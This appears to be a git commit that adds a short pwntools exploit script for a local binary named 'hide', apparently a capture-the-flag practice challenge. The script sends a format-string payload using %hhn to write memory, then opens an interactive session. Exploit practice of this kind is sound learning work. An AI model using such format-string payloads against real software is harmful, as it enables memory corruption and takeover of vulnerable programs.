This commit is contained in:
jc
2025-08-05 17:57:08 +03:00
parent 22ae6d18ef
commit e2130d43ee
17 changed files with 194 additions and 0 deletions
+14
View File
@@ -0,0 +1,14 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hide", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
s(b"%160c%hhn%6$s")
r.interactive()